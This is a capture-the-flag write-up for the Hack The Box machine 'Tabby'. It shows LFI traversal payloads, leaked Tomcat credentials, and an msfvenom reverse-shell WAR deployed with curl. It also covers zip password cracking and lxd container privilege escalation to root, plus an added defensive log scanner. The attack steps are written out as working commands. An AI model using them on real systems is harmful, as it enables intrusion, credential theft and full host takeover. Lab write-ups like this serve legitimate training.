Hack The Box — Tabby WriteUp

Steps to Get the User Flag
Nmap scan.
nmap -sV -sC -Pn 10.10.10.194

Access the web page by visiting the IP address in the browser.

After some enumeration of the webpage I found a URL that redirects to http://megahosting.htb/news.php?file=statement.
So I replaced megahosting.htb with my IP and also added megahosting.htb to /etc/hosts.
After visiting that page I found that it is vulnerable to Local File Inclusion (LFI).
Check the URL.

So I entered the payload ../../../../etc/passwd in the file parameter to view the passwd file.

Visiting the 8080 port
Visit the URL http://10.10.10.194:8080 and it shows the following result.

When I clicked on Host Manager I got a login portal. I tried some default credentials but got nothing.
So now it is clear that we have to get the password of the Apache web server admin.
So I Googled Apache configuration files and found out about some XML files, so we also need to look at the page source.
I learned that the configuration files are saved under /usr/share.
Searching more, I tried the URL
http://10.10.10.194/news.php?file=../../../../../../usr/share/tomcat9/etc/tomcat-users.xml which returns a blank page, but viewing its page source clearly shows the username and password.

Username = tomcat
Password = $3cureP4s5w0rd123!
Roles = admin-gui, manager-script
Let’s log in with these credentials and enumerate the GUI panel.

From the roles given above I learned that we can use the curl command to create, delete and manage applications.
So i created my reverse shell using msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your_IP> LPORT=4444 -f war > shell.war
Upload the reverse shell using the curl command (the password is single-quoted so the shell does not expand $3 or the trailing !):
curl -u 'tomcat:$3cureP4s5w0rd123!' -T shell.war 'http://10.10.10.194:8080/manager/text/deploy?path=/rev_shell'
Now I started a listener on port 4444 and triggered the shell with the command:
curl -u 'tomcat:$3cureP4s5w0rd123!' http://10.10.10.194:8080/rev_shell/

Got the shell.
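From the defender's side, both steps above leave distinctive entries in the web server's access log: directory traversal in the file parameter of news.php and deployment through the Tomcat manager text interface. The following scanner is an added example, not part of the original writeup; the log lines are constructed to mirror the requests above, and the client IP and timestamps are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed Apache combined-format access log modelled on the requests in the
# writeup (client IP 10.10.14.5 and timestamps are invented for the example).
SAMPLE_LOG = """\
10.10.14.5 - - [06/Nov/2020:23:37:01 +0000] "GET /news.php?file=statement HTTP/1.1" 200 1832 "-" "Mozilla/5.0"
10.10.14.5 - - [06/Nov/2020:23:37:09 +0000] "GET /news.php?file=../../../../etc/passwd HTTP/1.1" 200 2604 "-" "Mozilla/5.0"
10.10.14.5 - - [06/Nov/2020:23:37:20 +0000] "GET /news.php?file=..%2F..%2F..%2F..%2Fusr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1" 200 0 "-" "curl/7.72.0"
10.10.14.5 - - [06/Nov/2020:23:38:02 +0000] "PUT /manager/text/deploy?path=/rev_shell HTTP/1.1" 200 54 "-" "curl/7.72.0"
10.10.14.5 - - [06/Nov/2020:23:38:10 +0000] "GET /rev_shell/ HTTP/1.1" 200 0 "-" "curl/7.72.0"
"""

# Combined log format: ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify(line):
    """Return a list of finding tags for one access-log line (empty if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    method, target = m.group("method"), m.group("target")
    url = urlsplit(target)
    findings = []
    # parse_qs already decodes %2F once; decode again so double-encoded
    # traversal sequences (%252F) are caught as well.
    for key, values in parse_qs(url.query, keep_blank_values=True).items():
        for v in values:
            decoded = unquote(unquote(v))
            if "../" in decoded or "..\\" in decoded:
                findings.append(f"lfi_traversal:{key}")
            if "tomcat-users.xml" in decoded or decoded.endswith("/etc/passwd"):
                findings.append(f"sensitive_file:{key}")
    # Any use of the manager text interface (manager-script role) is worth an alert.
    if url.path.startswith("/manager/text/") and method in ("PUT", "GET"):
        findings.append("tomcat_manager_text")
    return findings


def scan(log_text):
    """Map the timestamp of each suspicious line to its sorted, de-duplicated findings."""
    results = {}
    for line in log_text.splitlines():
        tags = classify(line)
        if tags:
            results[LOG_RE.match(line).group("ts")] = sorted(set(tags))
    return results
```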
Changed directory to /var/www/html.
Now I checked for any files that might help me further.
Changed the current directory to files. And here we go, there is a backup file named 16162020_backup.zip.

Let’s download that file using netcat and save it on our machine.
When unzipping the file I found that it is password protected, so I used fcrackzip to crack the password.
Password = admin@it
Now I used this password with the username ash via the command su ash.

In /home/ash we got our user.txt.
PRIVILEGE ESCALATION
First I tried sudo -l but we don’t have permission for it.
Ran the id command to check info about the user and groups.
There was an interesting group: lxd.
So I Googled privilege escalation via lxd and found an article on the Hacking Articles website.
https://www.hackingarticles.in/lxd-privilege-escalation/
I followed the same steps:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
sudo bash build-alpine
Then I started a SimpleHTTPServer.
Now, in the home directory of ash, download our Alpine tar.gz file using wget:
wget http://YOUR_IP:8000/alpine-v3.12-x86_64-20201106_2337.tar.gz
lxc image import ./alpine-v3.12-x86_64-20201106_2337.tar.gz --alias simage
lxc image list

lxc init simage -c security.privileged=true
lxc config device add amazing-bullfrog mydevice disk source=/ path=/mnt/root recursive=true

lxc start amazing-bullfrog
lxc exec amazing-bullfrog /bin/sh
id

cd /mnt/root
cd root
ls
cat root.txt

Owned Tabby!!!